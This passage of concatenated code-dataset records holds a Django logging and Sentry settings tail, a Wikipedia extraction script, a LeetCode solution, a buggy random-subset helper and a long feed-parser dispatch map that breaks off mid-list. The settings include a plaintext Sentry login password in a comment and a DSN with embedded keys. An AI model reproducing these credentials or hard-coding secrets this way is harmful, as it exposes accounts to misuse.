'formatter': 'verbose',\n },\n },\n\n 'loggers': {\n 'django': {\n 'handlers': ['default'],\n # 这个参数表示这个logger不会被项目别的地方捕捉(个人简单理解,暂时还是比较疑惑)\n 'propagate': False,\n 'level': 'INFO',\n },\n 'django.request': {\n 'handlers': ['default_err'],\n 'level': 'ERROR',\n 'propagate': False,\n },\n 'elapsed_logger': {\n 'handlers': ['elapsed_logger'],\n 'level': 'INFO',\n 'propagate': False,\n },\n 'exception_logger': {\n 'handlers': ['exception_logger'],\n 'level': 'INFO',\n 'propagate': False,\n },\n }\n}\n\n#sentry的配置 登录的账号liuzongrun 
密码111111\nRAVEN_CONFIG = {\n 'dsn': 'http://483c3952b67247de91cb039622da7966:93a97682c316413db8092d597b3ef1a5@182.92.11.6:9000/2',\n 'sync': True,\n 'enabled': True,\n}\n\nINSTALLED_APPS = INSTALLED_APPS + (\n 'raven.contrib.django.raven_compat',\n)\n\n","sub_path":"settings_online.py","file_name":"settings_online.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"394759513","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport sys\n\nif len(sys.argv) < 2:\n sys.stderr.write('USAGE: {} \\n'.format(sys.argv[0]))\n sys.exit(1)\n\nfor line in sys.stdin:\n line = line.strip('\\n')\n d = json.loads(line)\n\n if d['title'] == 'ISO 3166-1':\n with open(sys.argv[1], 'w') as fo:\n fo.write(line)\n fo.write('\\n')\n\n if d['title'].startswith('Wikipedia:'):\n continue\n\n stop = False\n summary = ''\n category = []\n for line in d['text'].split('\\n'):\n if line.startswith('==') and line.endswith('=='):\n stop = True\n if line.startswith('[[Category:') and line[-2:] == ']]':\n category.append(line[11:-2])\n if not stop:\n summary += line\n summary += '\\n'\n print(json.dumps(dict(title=d['title'], text=summary, category=category), ensure_ascii=False))\n","sub_path":"tools/extract_articles.py","file_name":"extract_articles.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646721543","text":"# 789. Escape The Ghosts\nclass Solution:\n def escapeGhosts(self, ghosts, target):\n \"\"\"\n :type ghosts: List[List[int]]\n :type target: List[int]\n :rtype: bool\n \"\"\"\n target = (target[0], target[1])\n def checkGhost(p, d):\n for ghost in ghosts:\n if abs(p[0]-ghost[0])+abs(p[1]-ghost[1])<=d: return False\n return True\n p = (0,0)\n xDirection = 1 if target[0]>p[0] else -1\n yDirection = 1 if target[1]>p[1] else -1\n step = 0\n while p != target:\n if not checkGhost(p,step): return False\n if p[0] != target[0]:\n p = (p[0]+xDirection, p[1])\n else:\n p = (p[0], p[1]+yDirection)\n step += 1 \n if not checkGhost(p,step): return False \n return True\n","sub_path":"789/lc789-solution1.py","file_name":"lc789-solution1.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275322939","text":"import random as r\n\n\nclass Tester:\n test = 8\n\n\ndef list_random_subset(superset_list, out_max=0):\n \"\"\"\n Returns a list by taking a random, non-overlapping subset from .\n\n :param superset_list: List to take subset from\n :param out_max: Maximum size oft he output list\n :return: A random subset of \n \"\"\"\n\n if out_max == 0:\n return superset_list\n\n index_list = [i for i in range(len(superset_list))]\n new_list = []\n\n while len(index_list) > 0 and len(new_list) < out_max:\n index = index_list(r.randrange(0, len(index_list)))\n new_list.append(superset_list[index])\n index_list.remove(index)\n\n return new_list\n\n\ndef hello():\n print(\"Hello\")","sub_path":"tobias_py/basic/random/rand.py","file_name":"rand.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61517794","text":"\n#!/usr/bin/python\n# from profilehooks import profile\nimport urllib.parse\nimport json\nimport traceback\nimport WebMirror.OutputFilters.util.feedNameLut as feedNameLut\n\n\nimport WebMirror.OutputFilters.rss.ParserFuncs_a_g 
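The LOGGING dictConfig above repeats one handler recipe several times; its skeleton reduced to a single formatter, handler, and named logger (the filename and logger name are placeholders, not values from the original):

import logging.config

LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(filename)s '
                      '%(funcName)s [line:%(lineno)d] %(message)s'
        },
    },
    'handlers': {
        # WatchedFileHandler reopens the file if log rotation moves it.
        'app_file': {
            'level': 'INFO',
            'class': 'logging.handlers.WatchedFileHandler',
            'filename': '/tmp/app.log',  # placeholder path
            'formatter': 'verbose',
        },
    },
    'loggers': {
        'app': {
            'handlers': ['app_file'],
            'level': 'INFO',
            'propagate': False,
        },
    },
}

logging.config.dictConfig(LOGGING)
logging.getLogger('app').info('configured')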
as pfuncs_a_g\nimport WebMirror.OutputFilters.rss.ParserFuncs_h_n as pfuncs_h_n\nimport WebMirror.OutputFilters.rss.ParserFuncs_o_u as pfuncs_o_u\nimport WebMirror.OutputFilters.rss.ParserFuncs_stub as pfuncs_stub\nimport WebMirror.OutputFilters.rss.ParserFuncs_v_other as pfuncs_v_other\n\nfrom WebMirror.OutputFilters.util.TitleParsers import extractVolChapterFragmentPostfix\n\nimport WebMirror.OutputFilters.FilterBase\nimport WebMirror.rules\nimport flags\n\nskip_filter = [\n\t\"www.baka-tsuki.org\",\n\t\"re-monster.wikia.com\",\n\t'inmydaydreams.com',\n\t'www.fanfiction.net',\n\t'www.booksie.com',\n\t'www.booksiesilk.com',\n\t'www.fictionpress.com',\n\t'storiesonline.net',\n\t'www.fictionmania.tv',\n\t'pokegirls.org',\n\t'www.asstr.org',\n\t'www.mcstories.com',\n\t'www.novelupdates.com',\n\t'40pics.com',\n\n]\n\n\n\nclass DataParser(WebMirror.OutputFilters.FilterBase.FilterBase):\n\n\tamqpint = None\n\tamqp_connect = True\n\n\tdef __init__(self, transfer=True, debug_print=False, write_debug=False, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\n\t\tself.dbg_print = debug_print\n\t\tself.transfer = transfer\n\t\tself.names = set()\n\n\t\tself.write_debug = write_debug\n\n\t####################################################################################################################################################\n\t####################################################################################################################################################\n\t##\n\t## Dispatcher\n\t##\n\t####################################################################################################################################################\n\t####################################################################################################################################################\n\n\n\tdef dispatchRelease(self, item):\n\n\t\tret = False\n\n\t\tfuncMap = {\n\n\t\t\t\t'A0132' : pfuncs_a_g.extractA0132,\n\t\t\t\t'Adamantine Dragon in the Crystal World' : pfuncs_a_g.extractAdamantineDragonintheCrystalWorld,\n\t\t\t\t'AFlappyTeddyBird' : pfuncs_a_g.extractAFlappyTeddyBird,\n\t\t\t\t'A Grey World' : pfuncs_a_g.extractAGreyWorld,\n\t\t\t\t'Albert Kenoreijou' : pfuncs_a_g.extractAlbertKenoreijou,\n\t\t\t\t'Alcsel Translations' : pfuncs_a_g.extractAlcsel,\n\t\t\t\t'Alice Translations' : pfuncs_a_g.extractAliceTranslations,\n\t\t\t\t'alicetranslations.wordpress.com' : pfuncs_a_g.extractAlicetranslations,\n\t\t\t\t'All\\'s Fair In Love & War' : pfuncs_a_g.extractAllsFairInLoveWar,\n\t\t\t\t'Altoroc Translations' : pfuncs_a_g.extractAltorocTranslations,\n\t\t\t\t'Alyschu & Co' : pfuncs_a_g.extractAlyschuCo,\n\t\t\t\t'Amery Edge' : pfuncs_a_g.extractAmeryEdge,\n\t\t\t\t'Anathema Serial' : pfuncs_a_g.extractAnathema,\n\t\t\t\t'Andrew9495\\'s MTL corner' : pfuncs_a_g.extractAndrew9495,\n\t\t\t\t'ヾ(。 ̄□ ̄)ツ' : pfuncs_a_g.extractAngry,\n\t\t\t\t'Anne And Cindy' : pfuncs_a_g.extractAnneAndCindy,\n\t\t\t\t'Anon Empire' : pfuncs_a_g.extractAnonEmpire,\n\t\t\t\t'Another Parallel World' : pfuncs_a_g.extractAnotherParallelWorld,\n\t\t\t\t'Another World Translations' : pfuncs_a_g.extractAnotherWorldTranslations,\n\t\t\t\t'Aori Translations' : pfuncs_a_g.extractAoriTranslations,\n\t\t\t\t'A Pearly View' : pfuncs_a_g.extractAPearlyView,\n\t\t\t\t'Aquarilas\\' Scenario' : pfuncs_a_g.extractAquarilasScenario,\n\t\t\t\t'Aqua Scans' : pfuncs_a_g.extractAquaScans,\n\t\t\t\t'Aran Translations' : pfuncs_a_g.extractAranTranslations,\n\t\t\t\t'Archivity' : pfuncs_a_g.extractArchivity,\n\t\t\t\t'Ares Novels' : 
pfuncs_a_g.extractAresNovels,\n\t\t\t\t'Ark Machine Translations' : pfuncs_a_g.extractArkMachineTranslations,\n\t\t\t\t'asd398' : pfuncs_a_g.extractAsd398,\n\t\t\t\t'AsherahBlue\\'s Notebook' : pfuncs_a_g.extractAsherahBlue,\n\t\t\t\t'Aten Translations' : pfuncs_a_g.extractAtenTranslations,\n\t\t\t\t'A Translator\\'s Ramblings' : pfuncs_a_g.extractATranslatorsRamblings,\n\t\t\t\t'A traveler\\'s translations.' : pfuncs_a_g.extractATravelersTranslations,\n\t\t\t\t'Avert Translations' : pfuncs_a_g.extractAvert,\n\t\t\t\t'Ayax World' : pfuncs_a_g.extractAyaxWorld,\n\t\t\t\t'Azure Sky Translation' : pfuncs_a_g.extractAzureSky,\n\t\t\t\t'Azurro 4 Cielo' : pfuncs_a_g.extractAzurro,\n\t\t\t\t'Bad Translation' : pfuncs_a_g.extractBadTranslation,\n\t\t\t\t'Baka Dogeza Translation' : pfuncs_a_g.extractBakaDogeza,\n\t\t\t\t'Baka Pervert' : pfuncs_a_g.extractBakaPervert,\n\t\t\t\t\"'Ball'-Kicking Gang Boss\" : pfuncs_a_g.extractBallKickingGangBoss,\n\t\t\t\t'The Bathrobe Knight' : pfuncs_a_g.extractBathrobeKnight,\n\t\t\t\t'Bayabusco Translation' : pfuncs_a_g.extractBayabuscoTranslation,\n\t\t\t\t'Bcat00 Translation' : pfuncs_a_g.extractBcat00,\n\t\t\t\t'Bear Bear Translations' : pfuncs_a_g.extractBearBearTranslations,\n\t\t\t\t'Beehugger' : pfuncs_a_g.extractBeehugger,\n\t\t\t\t'The Beginning After The End' : pfuncs_a_g.extractBeginningAfterTheEnd,\n\t\t\t\t'Berseker Translations' : pfuncs_a_g.extractBersekerTranslations,\n\t\t\t\t'BeRsErk Translations' : pfuncs_a_g.extractBeRsErkTranslations,\n\t\t\t\t'Bijinsans' : pfuncs_a_g.extractBijinsans,\n\t\t\t\t'Binggo&Corp' : pfuncs_a_g.extractBinggoCorp,\n\t\t\t\t'Binhjamin' : pfuncs_a_g.extractBinhjamin,\n\t\t\t\t'Blade of Hearts' : pfuncs_a_g.extractBladeOfHearts,\n\t\t\t\t'Blublub' : pfuncs_a_g.extractBlublub,\n\t\t\t\t'Bluefire Translations' : pfuncs_a_g.extractBluefireTranslations,\n\t\t\t\t'Blue Silver Translations' : pfuncs_a_g.extractBlueSilverTranslations,\n\t\t\t\t'Books Movies and Beyond' : pfuncs_a_g.extractBooksMoviesAndBeyond,\n\t\t\t\t'Bruin Translation' : pfuncs_a_g.extractBruinTranslation,\n\t\t\t\t'Bu Bu Jing Xin Translation' : pfuncs_a_g.extractBuBuJingXinTrans,\n\t\t\t\t'Burei Dan Works' : pfuncs_a_g.extractBureiDan,\n\t\t\t\t'Calico x Tabby' : pfuncs_a_g.extractCalicoxTabby,\n\t\t\t\t'Cas Project Site' : pfuncs_a_g.extractCasProjectSite,\n\t\t\t\t'Cat Scans' : pfuncs_a_g.extractCatScans,\n\t\t\t\t\"Cautr's\" : pfuncs_a_g.extractCautrs,\n\t\t\t\t'CaveScans' : pfuncs_a_g.extractCaveScans,\n\t\t\t\t'cavescans.com' : pfuncs_a_g.extractCaveScans,\n\t\t\t\t'C.E. Light Novel Translations' : pfuncs_a_g.extractCeLn,\n\t\t\t\t'Ceruleonice Translations' : pfuncs_a_g.extractCeruleonice,\n\t\t\t\t'Cheddar!' 
: pfuncs_a_g.extractCheddar,\n\t\t\t\t'Chinese BL Translations' : pfuncs_a_g.extractChineseBLTranslations,\n\t\t\t\t'Chinese Weaboo Translations' : pfuncs_a_g.extractChineseWeabooTranslations,\n\t\t\t\t'Chrona Zero' : pfuncs_a_g.extractChronaZero,\n\t\t\t\t'Chronon Translations' : pfuncs_a_g.extractChrononTranslations,\n\t\t\t\t'ChubbyCheeks' : pfuncs_a_g.extractChubbyCheeks,\n\t\t\t\t'Circle of Shards' : pfuncs_a_g.extractCircleofShards,\n\t\t\t\t'Circus Translations' : pfuncs_a_g.extractCircusTranslations,\n\t\t\t\t'Clicky Click Translation' : pfuncs_a_g.extractClicky,\n\t\t\t\t'Cloud Manor' : pfuncs_a_g.extractCloudManor,\n\t\t\t\t'Cloud Translations' : pfuncs_a_g.extractCloudTranslations,\n\t\t\t\t'Clover\\'s Nook' : pfuncs_a_g.extractCloversNook,\n\t\t\t\t'Translated by a Clown' : pfuncs_a_g.extractClownTrans,\n\t\t\t\t'The C-Novel Project' : pfuncs_a_g.extractCNovelProj,\n\t\t\t\t'C Novels 2 C' : pfuncs_a_g.extractCNovels2C,\n\t\t\t\t'C-Novel Tranlations…' : pfuncs_a_g.extractCNovelTranlations,\n\t\t\t\t'Code-Zero\\'s Blog' : pfuncs_a_g.extractCodeZerosBlog,\n\t\t\t\t'CookiePasta' : pfuncs_a_g.extractCookiePasta,\n\t\t\t\t'CookiePasta Translations' : pfuncs_a_g.extractCookiePasta,\n\t\t\t\t'Cosmic Translation' : pfuncs_a_g.extractCosmicTranslation,\n\t\t\t\t'Crack of Dawn Translations' : pfuncs_a_g.extractCrackofDawnTranslations,\n\t\t\t\t'Crappy Machine Translation' : pfuncs_a_g.extractCrappyMachineTranslation,\n\t\t\t\t'Crazy for HE Novels' : pfuncs_a_g.extractCrazyForHENovels,\n\t\t\t\t'tiffybook.com' : pfuncs_a_g.extractCrazyForHENovels,\n\t\t\t\t'CrystalRainDescends' : pfuncs_a_g.extractCrystalRainDescends,\n\t\t\t\t'CtrlAlcalá' : pfuncs_a_g.extractCtrlAlcala,\n\t\t\t\t'Currently TLing [Bu ni Mi]' : pfuncs_a_g.extractCurrentlyTLingBuniMi,\n\t\t\t\t'DadIsHero Fan Translations' : pfuncs_a_g.extractDadIsHeroFanTranslations,\n\t\t\t\t'Daily-Dallying' : pfuncs_a_g.extractDailyDallying,\n\t\t\t\t'Dao Seeker Blog' : pfuncs_a_g.extractDaoSeekerBlog,\n\t\t\t\t'A fish once said this to me' : pfuncs_a_g.extractDarkFish,\n\t\t\t\t'Dark Translations' : pfuncs_a_g.extractDarkTranslations,\n\t\t\t\t'Dawning Howls' : pfuncs_a_g.extractDawningHowls,\n\t\t\t\t'Deadly Forgotten Legends' : pfuncs_a_g.extractDeadlyForgottenLegends,\n\t\t\t\t'Defan\\'s Translations' : pfuncs_a_g.extractDefansTranslations,\n\t\t\t\t'Defiring' : pfuncs_a_g.extractDefiring,\n\t\t\t\t'Dekinai Diary' : pfuncs_a_g.extractDekinaiDiary,\n\t\t\t\t'Delicious Translations' : pfuncs_a_g.extractDeliciousTranslations,\n\t\t\t\t'Demerith Translation' : pfuncs_a_g.extractDemerithTranslation,\n\t\t\t\t'Descent Subs' : pfuncs_a_g.extractDescentSubs,\n\t\t\t\t'Dewey Night Unrolls' : pfuncs_a_g.extractDeweyNightUnrolls,\n\t\t\t\t'DHH Translations' : pfuncs_a_g.extractDHHTranslations,\n\t\t\t\t'Disappointing Translations' : pfuncs_a_g.extractDisappointingTranslations,\n\t\t\t\t'Distracted Chinese' : pfuncs_a_g.extractDistractedChinese,\n\t\t\t\t'Distracted Translations' : pfuncs_a_g.extractDistractedTranslations,\n\t\t\t\t'Diwasteman' : pfuncs_a_g.extractDiwasteman,\n\t\t\t\t'DokuHana Translations' : pfuncs_a_g.extractDokuHanaTranslations,\n\t\t\t\t'Dorayakiz' : pfuncs_a_g.extractDorayakiz,\n\t\t\t\t\"DOW's Translations\" : pfuncs_a_g.extractDOWsTranslations,\n\t\t\t\t'DragomirCM' : pfuncs_a_g.extractDragomirCM,\n\t\t\t\t'Dragon MT' : pfuncs_a_g.extractDragonMT,\n\t\t\t\t'Dramas, Books & Tea' : pfuncs_a_g.extractDramasBooksTea,\n\t\t\t\t'Dreadful Decoding' : pfuncs_a_g.extractDreadfulDecoding,\n\t\t\t\t'Dream Avenue' : 
pfuncs_a_g.extractDreamAvenue,\n\t\t\t\t\"Dreamless Window's translation\" : pfuncs_a_g.extractDreamlessWindowsTranslation,\n\t\t\t\t'Dreams of Jianghu' : pfuncs_a_g.extractDreamsOfJianghu,\n\t\t\t\t'Ducky\\'s English Translations' : pfuncs_a_g.extractDuckysEnglishTranslations,\n\t\t\t\t'Duran Daru Translation' : pfuncs_a_g.extractDuranDaruTranslation,\n\t\t\t\t'Durasama' : pfuncs_a_g.extractDurasama,\n\t\t\t\t'Dynamis Gaul Light Novel' : pfuncs_a_g.extractDynamisGaul,\n\t\t\t\t'EccentricTranslations' : pfuncs_a_g.extractEccentricTranslations,\n\t\t\t\t'EC Webnovel' : pfuncs_a_g.extractECWebnovel,\n\t\t\t\t'ELYSION Translation' : pfuncs_a_g.extractELYSIONTranslation,\n\t\t\t\t'Emergency Exit\\'s Release Blog' : pfuncs_a_g.extractEmergencyExitsReleaseBlog,\n\t\t\t\t'Emruyshit Translations' : pfuncs_a_g.extractEmruyshitTranslations,\n\t\t\t\t'EndKun' : pfuncs_a_g.extractEndKun,\n\t\t\t\t'End Online Novel' : pfuncs_a_g.extractEndOnline,\n\t\t\t\t'Ensig\\'s Writings' : pfuncs_a_g.extractEnsigsWritings,\n\t\t\t\t'Ensj Translations' : pfuncs_a_g.extractEnsjTranslations,\n\t\t\t\t'Ente38 translations' : pfuncs_a_g.extractEnte38translations,\n\t\t\t\t'EnTruce Translations' : pfuncs_a_g.extractEnTruceTranslations,\n\t\t\t\t'Epithetic' : pfuncs_a_g.extractEpithetic,\n\t\t\t\t'Epyon Translations' : pfuncs_a_g.extractEpyonTranslations,\n\t\t\t\t'Ero Light Novel Translations' : pfuncs_a_g.extractEroLightNovelTranslations,\n\t\t\t\t'Eros Workshop' : pfuncs_a_g.extractErosWorkshop,\n\t\t\t\t'eternalpath.net' : pfuncs_a_g.extractEternalpath,\n\t\t\t\t'Etheria Translations' : pfuncs_a_g.extractEtheriaTranslations,\n\t\t\t\t'Eugene Rain' : pfuncs_a_g.extractEugeneRain,\n\t\t\t\t\"Evida's Indo Romance\" : pfuncs_a_g.extractEvidasIndoRomance,\n\t\t\t\t'Extant Visions' : pfuncs_a_g.extractExtantVisions,\n\t\t\t\t'Eye of Adventure ' : pfuncs_a_g.extractEyeofAdventure,\n\t\t\t\t'EZ Translations' : pfuncs_a_g.extractEZTranslations,\n\t\t\t\t'Fake typist' : pfuncs_a_g.extractFaketypist,\n\t\t\t\t'Fak Translations' : pfuncs_a_g.extractFakTranslations,\n\t\t\t\t'Falamar Translation' : pfuncs_a_g.extractFalamarTranslation,\n\t\t\t\t'Falinmer' : pfuncs_a_g.extractFalinmer,\n\t\t\t\t'Fanatical' : pfuncs_a_g.extractFanatical,\n\t\t\t\t'FeedProxy' : pfuncs_a_g.extractFeedProxy,\n\t\t\t\t'fgiLaN translations' : pfuncs_a_g.extractfgiLaNTranslations,\n\t\t\t\t'Fighting Dreamers Scanlations' : pfuncs_a_g.extractFightingDreamersScanlations,\n\t\t\t\t'Firebird\\'s Nest' : pfuncs_a_g.extractFirebirdsNest,\n\t\t\t\t'Five Star Specialists' : pfuncs_a_g.extractFiveStar,\n\t\t\t\t'Flicker Hero' : pfuncs_a_g.extractFlickerHero,\n\t\t\t\t'Flower Bridge Too' : pfuncs_a_g.extractFlowerBridgeToo,\n\t\t\t\t'Forgetful Dreamer' : pfuncs_a_g.extractForgetfulDreamer,\n\t\t\t\t'Forgotten Conqueror' : pfuncs_a_g.extractForgottenConqueror,\n\t\t\t\t'/' : pfuncs_a_g.extractForwardSlash,\n\t\t\t\t'Frostfire 10' : pfuncs_a_g.extractFrostfire10,\n\t\t\t\t'Fudge Translations' : pfuncs_a_g.extractFudgeTranslations,\n\t\t\t\t'Fung Shen' : pfuncs_a_g.extractFungShen,\n\t\t\t\t'Fuzion Life' : pfuncs_a_g.extractFuzionLife,\n\t\t\t\t'Gaochao Translations' : pfuncs_a_g.extractGaochaoTranslations,\n\t\t\t\t'Gargoyle Web Serial' : pfuncs_a_g.extractGargoyleWebSerial,\n\t\t\t\t'Gila Translation Monster' : pfuncs_a_g.extractGilaTranslation,\n\t\t\t\t'Giraffe Corps' : pfuncs_a_g.extractGiraffe,\n\t\t\t\t'[G.O] Chronicles' : pfuncs_a_g.extractGOChronicles,\n\t\t\t\t'Goddess! Grant Me a Girlfriend!!' 
: pfuncs_a_g.extractGoddessGrantMeaGirlfriend,\n\t\t\t\t'Gravity Tales' : pfuncs_a_g.extractGravityTranslation,\n\t\t\t\t'GrimdarkZ Translations' : pfuncs_a_g.extractGrimdarkZTranslations,\n\t\t\t\t'Grow with Me' : pfuncs_a_g.extractGrowWithMe,\n\t\t\t\t'Grow with me' : pfuncs_a_g.extractGrowWithMe,\n\t\t\t\t'guhehe.TRANSLATIONS' : pfuncs_a_g.extractGuhehe,\n\t\t\t\t'Guro Translation' : pfuncs_a_g.extractGuroTranslation,\n\t\t\t\t'Hajiko translation' : pfuncs_h_n.extractHajiko,\n\t\t\t\t'Hamster428' : pfuncs_h_n.extractHamster428,\n\t\t\t\t'HaruPARTY' : pfuncs_h_n.extractHaruPARTY,\n\t\t\t\t'Heart Crusade Scans' : pfuncs_h_n.extractHeartCrusadeScans,\n\t\t\t\t'Helidwarf' : pfuncs_h_n.extractHelidwarf,\n\t\t\t\t'Hello Translations' : pfuncs_h_n.extractHelloTranslations,\n\t\t\t\t'Hellping' : pfuncs_h_n.extractHellping,\n\t\t\t\t'Hell Yeah 524' : pfuncs_h_n.extractHellYeah524,\n\t\t\t\t'Hendricksen-sama' : pfuncs_h_n.extractHendricksensama,\n\t\t\t\t'Henouji Translation' : pfuncs_h_n.extractHenoujiTranslation,\n\t\t\t\t'Heroic Legend of Arslan Translations' : pfuncs_h_n.extractHeroicLegendOfArslanTranslations,\n\t\t\t\t'Heroic Novels' : pfuncs_h_n.extractHeroicNovels,\n\t\t\t\t'Hikki no Mori Translations' : pfuncs_h_n.extractHikkinoMoriTranslations,\n\t\t\t\t'Hokage Translations' : pfuncs_h_n.extractHokageTrans,\n\t\t\t\t'Hold \\'X\\' and Click' : pfuncs_h_n.extractHoldX,\n\t\t\t\t\"Hon'yaku\" : pfuncs_h_n.extractHonyaku,\n\t\t\t\t'Hot Cocoa Translations' : pfuncs_h_n.extractHotCocoa,\n\t\t\t\t\"Hugs & Love\" : pfuncs_h_n.extractHugsAndLove,\n\t\t\t\t'Hyorinmaru Blog' : pfuncs_h_n.extractHyorinmaruBlog,\n\t\t\t\t'Hyorinmaru' : pfuncs_h_n.extractHyorinmaruBlog,\n\t\t\t\t'Imoutolicious Light Novel Translations' : pfuncs_h_n.extractImoutolicious,\n\t\t\t\t'Infinite Novel Translations' : pfuncs_h_n.extractInfiniteNovelTranslations,\n\t\t\t\t'Infinite Translations' : pfuncs_h_n.extractInfiniteTranslations,\n\t\t\t\t'IntenseDesSugar' : pfuncs_h_n.extractIntenseDesSugar,\n\t\t\t\t'Isekai Mahou Translations!' 
: pfuncs_h_n.extractIsekaiMahou,\n\t\t\t\t'Isekai Soul-Cyborg Translations' : pfuncs_h_n.extractIsekaiTranslation,\n\t\t\t\t'Reigokai: Isekai Translations' : pfuncs_h_n.extractIsekaiTranslations,\n\t\t\t\t'Isolarium' : pfuncs_h_n.extractIsolarium,\n\t\t\t\t'Istian\\'s Workshop' : pfuncs_h_n.extractIstiansWorkshop,\n\t\t\t\t'Iterations within a Thought-Eclipse' : pfuncs_h_n.extractIterations,\n\t\t\t\t'itranslateln' : pfuncs_h_n.extractItranslateln,\n\t\t\t\t'izra709 | B Group no Shounen Translations' : pfuncs_h_n.extractIzra709,\n\t\t\t\t'Jagaimo' : pfuncs_h_n.extractJagaimo,\n\t\t\t\t'Januke Translations' : pfuncs_h_n.extractJanukeTranslations,\n\t\t\t\t'Japtem' : pfuncs_h_n.extractJaptem,\n\t\t\t\t'JawzTranslations' : pfuncs_h_n.extractJawzTranslations,\n\t\t\t\t'Joeglen\\'s Translation Space' : pfuncs_h_n.extractJoeglensTranslationSpace,\n\t\t\t\t'Joie de Vivre' : pfuncs_h_n.extractJoiedeVivre,\n\t\t\t\t'Jun Juntianxia' : pfuncs_h_n.extractJunJuntianxia,\n\t\t\t\t'Kaezar Translations' : pfuncs_h_n.extractKaezar,\n\t\t\t\t'Kahoim Translations' : pfuncs_h_n.extractKahoim,\n\t\t\t\t'Kakkokari' : pfuncs_h_n.extractKakkokari,\n\t\t\t\t'Kami Translation' : pfuncs_h_n.extractKamiTranslation,\n\t\t\t\t'Kawaii Daikon' : pfuncs_h_n.extractKawaiiDaikon,\n\t\t\t\t'Kedelu' : pfuncs_h_n.extractKedelu,\n\t\t\t\t'Kerambit\\'s Incisions' : pfuncs_h_n.extractKerambit,\n\t\t\t\t'Keyo Translations' : pfuncs_h_n.extractKeyoTranslations,\n\t\t\t\t'King Jaahn\\'s Subjects' : pfuncs_h_n.extractKingJaahn,\n\t\t\t\t'Kiri Leaves' : pfuncs_h_n.extractKiri,\n\t\t\t\t'Kiriko Translations' : pfuncs_h_n.extractKirikoTranslations,\n\t\t\t\t'Kisato\\'s MLTs' : pfuncs_h_n.extractKisatosMLTs,\n\t\t\t\t'Knokkro Translations' : pfuncs_h_n.extractKnokkroTranslations,\n\t\t\t\t'KN Translation' : pfuncs_h_n.extractKNTranslation,\n\t\t\t\t'Blazing Translations' : pfuncs_h_n.extractKnW,\n\t\t\t\t'CapsUsingShift Tl' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Insignia Pierce' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Konjiki no Wordmaster' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Loliquent' : pfuncs_h_n.extractKnW,\n\t\t\t\t'Pummels Translations' : pfuncs_h_n.extractKnW,\n\t\t\t\t'KobatoChanDaiSukiScan' : pfuncs_h_n.extractKobatoChanDaiSukiScan,\n\t\t\t\t'Kokuma Translations' : pfuncs_h_n.extractKokumaTranslations,\n\t\t\t\t'KONDEE Translations' : pfuncs_h_n.extractKONDEETranslations,\n\t\t\t\t'Konobuta' : pfuncs_h_n.extractKonobuta,\n\t\t\t\t'Koong Koong Translations' : pfuncs_h_n.extractKoongKoongTranslations,\n\t\t\t\t'Korean Novel Translations' : pfuncs_h_n.extractKoreanNovelTrans,\n\t\t\t\t'Kore Yori Hachidori' : pfuncs_h_n.extractKoreYoriHachidori,\n\t\t\t\t'Krytyk\\'s Translations' : pfuncs_h_n.extractKrytyksTranslations,\n\t\t\t\t'Kuma Otou' : pfuncs_h_n.extractKumaOtou,\n\t\t\t\t'Kuro Translations' : pfuncs_h_n.extractKuroTranslations,\n\t\t\t\t'Kurotsuki Novel' : pfuncs_h_n.extractKurotsukiNovel,\n\t\t\t\t'Kyakka' : pfuncs_h_n.extractKyakka,\n\t\t\t\t'Kyakka Translations' : pfuncs_h_n.extractKyakkaTranslations,\n\t\t\t\t'kyoptionslibrary.blogspot.com' : pfuncs_h_n.extractKyoptionslibrary,\n\t\t\t\t'L2M' : pfuncs_h_n.extractL2M,\n\t\t\t\t'Larvyde' : pfuncs_h_n.extractLarvyde,\n\t\t\t\t'Lascivious Imouto' : pfuncs_h_n.extractLasciviousImouto,\n\t\t\t\t'Lastvoice Translator' : pfuncs_h_n.extractLastvoiceTranslator,\n\t\t\t\t'Layzisheep' : pfuncs_h_n.extractLayzisheep,\n\t\t\t\t'Legend of Galactic Heroes Translation Project' : pfuncs_h_n.extractLegendofGalacticHeroes,\n\t\t\t\t'Lickymee Translations' : 
pfuncs_h_n.extractLickymeeTranslations,\n\t\t\t\t'Light Novels Translations' : pfuncs_h_n.extractLightNovelsTranslations,\n\t\t\t\t'Light Novel translations' : pfuncs_h_n.extractLightNoveltranslations,\n\t\t\t\t'Lil\\' Bliss Novels' : pfuncs_h_n.extractLilBlissNovels,\n\t\t\t\t'Lingson\\'s Translations' : pfuncs_h_n.extractLingson,\n\t\t\t\t'Ling Translates Sometimes' : pfuncs_h_n.extractLingTranslatesSometimes,\n\t\t\t\t'Linked Translations' : pfuncs_h_n.extractLinkedTranslations,\n\t\t\t\t'Little Novel Translation' : pfuncs_h_n.extractLittleNovelTranslation,\n\t\t\t\t'LittleShanks Translations' : pfuncs_h_n.extractLittleShanksTranslations,\n\t\t\t\t'Little Translations' : pfuncs_h_n.extractLittleTranslations,\n\t\t\t\t'Lizard Translations' : pfuncs_h_n.extractLizardTranslations,\n\t\t\t\t'LMS Machine Translations' : pfuncs_h_n.extractLMSMachineTranslations,\n\t\t\t\t'Ln Addiction' : pfuncs_h_n.extractLnAddiction,\n\t\t\t\t'Lohithbb TLs' : pfuncs_h_n.extractLohithbbTLs,\n\t\t\t\t'Loiterous' : pfuncs_h_n.extractLoiterous,\n\t\t\t\t'Lonahora' : pfuncs_h_n.extractLonahora,\n\t\t\t\t'LorCromwell' : pfuncs_h_n.extractLorCromwell,\n\t\t\t\t'LordofScrubs' : pfuncs_h_n.extractLordofScrubs,\n\t\t\t\t'Lost in Translation' : pfuncs_h_n.extractLostInTranslation,\n\t\t\t\t'Luen Translations' : pfuncs_h_n.extractLuenTranslations,\n\t\t\t\t'Lunaris' : pfuncs_h_n.extractLunaris,\n\t\t\t\t'Lunate' : pfuncs_h_n.extractLunate,\n\t\t\t\t'LygarTranslations' : 